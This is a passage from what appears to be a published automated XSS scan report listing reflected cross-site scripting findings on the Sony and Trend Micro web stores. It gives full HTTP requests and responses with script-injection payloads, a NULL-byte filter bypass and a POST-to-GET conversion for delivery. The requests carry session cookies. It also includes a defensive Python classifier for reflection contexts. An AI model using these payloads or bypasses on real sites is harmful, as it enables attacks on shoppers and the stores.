The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00119e4"><script>alert(1)</script>575ce0e01d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 119e4"><script>alert(1)</script>575ce0e01d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0&%00119e4"><script>alert(1)</script>575ce0e01d1=1 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; 
TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 115393
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 115393
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:59:06 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<a href="SearchCatalog?langId=-1&.119e4"><script>alert(1)</script>575ce0e01d1=1&storeId=10151&y=0&catalogId=10551&Nty=1&x=0" id="" class="breadBoxRemoveLink" rel="">
...[SNIP]...

1.29. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [x parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d6f1"><a>edd0ae37b53 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=02d6f1"><a>edd0ae37b53&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; 
TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 115107
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 115107
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:38 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<a href="SearchCatalog?langId=-1&storeId=10151&y=0&catalogId=10551&Nty=1&x=02d6f1"><a>edd0ae37b53" id="" class="breadBoxRemoveLink" rel="">
...[SNIP]...

1.30. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [y parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ce3"><a>5cf4dd19a25 was submitted in the y parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=045ce3"><a>5cf4dd19a25 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; 
TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 115107
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 115107
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:51 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<a href="SearchCatalog?langId=-1&storeId=10151&y=045ce3"><a>5cf4dd19a25&catalogId=10551&Nty=1&x=0" id="" class="breadBoxRemoveLink" rel="">
...[SNIP]...

1.31. https://store.trendmicro.com/DRHM/store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c14cf--><script>alert(1)</script>aecb86347bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside an HTML comment does not prevent XSS if the user can close the comment (with -->) or otherwise introduce script within the comment context. In this instance the comment is an ESI include directive and the reflected parameter name also becomes part of its src URL, so the data should be percent-encoded as a URL component before it is written there, or better, not reflected into the directive at all.

Request

GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&c14cf--><script>alert(1)</script>aecb86347bd=1 HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101360797589,0)
Date: Tue, 06 Sep 2011 18:21:54 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app94
Content-Length: 56229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=5089ab1c&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1780400&StyleVersion=42&c14cf--><script>alert(1)</script>aecb86347bd=1&ceid=177147900&cename=TopHeader&id=CheckoutPaymentAnonymousPage"-->
...[SNIP]...
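
The findings in this section differ mainly in the syntactic context the canary lands in: an HTML comment (1.31), a double-quoted attribute (1.32, 1.33, 1.39, 1.40), a single-quoted attribute (1.35 to 1.38), a JavaScript string (1.41, 1.42) and a bare JavaScript expression (1.34). When retesting, the first thing to confirm is that the reported context is right and that the break-out characters survived. The Python below is an added example, not part of the XSS.CX report or of Burp Suite, that classifies the context of a reflected canary in a response body. The response fragments are constructed to mirror the reflected lines in this report, not captured traffic, and the is_script flag is an assumption used to mark bodies that are JavaScript rather than HTML.

```python
import re
from typing import Optional


def _open_quote(text: str) -> Optional[str]:
    """Return the quote character (' or ") still open at the end of `text`, or None.
    A backslash skips the next character so JS escapes such as \\" are handled. This is
    a heuristic: it does not understand JS comments or regex literals."""
    quote = None
    i = 0
    while i < len(text):
        ch = text[i]
        if quote is not None:
            if ch == "\\":
                i += 1
            elif ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
        i += 1
    return quote


def reflection_context(body: str, canary: str, is_script: bool = False) -> dict:
    """Classify the syntactic context of the first occurrence of `canary` in `body`
    and name the characters needed to break out of it. `is_script` marks bodies that
    are JavaScript rather than HTML (JSONP responses such as the one in 1.34)."""
    idx = body.find(canary)
    if idx < 0:
        return {"context": "not reflected", "breakout": None}
    before = body[:idx]
    lower = before.lower()

    # HTML comment: the nearest <!-- has no matching --> before the canary.
    if not is_script and before.rfind("<!--") > before.rfind("-->"):
        return {"context": "html comment", "breakout": "-->"}

    # Script body: a <script> tag was opened and not closed before the canary.
    script_start = 0
    if not is_script:
        open_tag = lower.rfind("<script")
        if open_tag > lower.rfind("</script"):
            is_script = True
            script_start = before.find(">", open_tag) + 1
    if is_script:
        quote = _open_quote(before[script_start:])
        if quote:
            return {"context": f"JavaScript string ({quote})", "breakout": quote}
        return {"context": "JavaScript expression", "breakout": ";"}

    # Inside a tag: a < with no > after it; find which attribute quote is open.
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:
        quote = _open_quote(before[lt:])
        if quote:
            return {"context": f"{quote}-quoted attribute", "breakout": quote + ">"}
        return {"context": "unquoted attribute", "breakout": " "}

    return {"context": "html text", "breakout": "<"}


# Constructed response fragments shaped like the reflected lines in this report
# (not captured traffic), paired with the canary prefix each payload started with.
SAMPLES = {
    "1.31 comment": (
        '<html><head>\n<!--!esi:include src="/store?Action=DisplayESIPage&Locale=en_US'
        '&c14cf=1&id=CheckoutPaymentAnonymousPage"-->\n</head>',
        "c14cf"),
    "1.32 attr dq": (
        '<input type="radio" name="paymentMethodID" value="-12c3e0" id="CreditCardMethod">',
        "2c3e0"),
    "1.35 attr sq": (
        "<link href='WebConnectCss/cfs35f67.css' type=\"text/css\" rel=\"stylesheet\" />",
        "35f67"),
    "1.41 js str": (
        '<script type="text/javascript">\nfunction f(cmd){\n  case \'hilite\' :\n'
        '    var viewDocUrl = "/selfservice/viewdocument.do?cmd=displayKC91bbd&dialogID=1";\n'
        '</script>',
        "91bbd"),
    "1.34 jsonp": (
        '(function(){stButtons.processCBb4556({"url":"http://www.javaworld.com/","total":10})})()',
        "b4556"),
}


def classify_samples() -> dict:
    """Run the classifier over every constructed sample."""
    return {name: reflection_context(body, canary, is_script=name.endswith("jsonp"))
            for name, (body, canary) in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in classify_samples().items():
        print(f"{name:14s} -> {result['context']:24s} break out with {result['breakout']!r}")
```

Search for the random prefix of the canary (c14cf, 2c3e0, ...) rather than the whole payload: the prefix is what survives when the application strips or encodes the metacharacters, and the break-out string the classifier returns is exactly what to look for in the response to decide between "echoed unmodified" and "echoed as".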

1.32. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452524 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The value of the paymentMethodID%24%2452524 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c3e0"><script>alert(1)</script>44993469a8dc0473c was submitted in the paymentMethodID%24%2452524 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; it was possible to convert it to a GET request, which makes the attack easier to demonstrate and to deliver (for example as a link or image URL).

Request

GET /DRHM/store?Action=PostCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=CheckoutPaymentAnonymousPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_companyName=&companyName=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_state=&state=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2452525=190000&paymentMethodID%24%2452525=190000&ORIG_VALUE_name%24%2452525=PayPalExpress&name%24%2452525=PayPalExpress&ORIG_VALUE_paymentMethodID%24%2452524=-1&paymentMethodID%24%2452524=-12c3e0"><script>alert(1)</script>44993469a8dc0473c&ORIG_VALUE_name%24%2452524=CreditCardMethod&name%24%2452524=CreditCardMethod&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=false&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&x=27&y=13 HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US
Cache-Control: max-age=0
Origin: https://store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
